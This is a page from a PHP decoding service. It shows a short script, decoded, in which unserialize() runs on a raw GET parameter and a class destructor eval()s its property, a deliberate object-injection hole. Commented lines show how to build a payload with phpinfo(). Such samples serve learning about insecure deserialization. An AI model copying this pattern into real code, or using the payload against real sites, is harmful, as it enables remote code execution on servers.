Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php class Example { var $var = ''; function __destruct() { ..
Decoded Output download
<?php
class Example
{
var $var = '';
function __destruct()
{
eval($this->var);
}
}
//$exp = new Example();
//$exp->var = "phpinfo();";
//die(serialize($exp));
unserialize($_GET['saved_code']);
?>
Did this file decode correctly?
Original Code
<?php
class Example
{
var $var = '';
function __destruct()
{
eval($this->var);
}
}
//$exp = new Example();
//$exp->var = "phpinfo();";
//die(serialize($exp));
unserialize($_GET['saved_code']);
?>
Function Calls
None |
Stats
MD5 | 0c54b44361fc28188afc9f63e159a48c |
Eval Count | 0 |
Decode Time | 116 ms |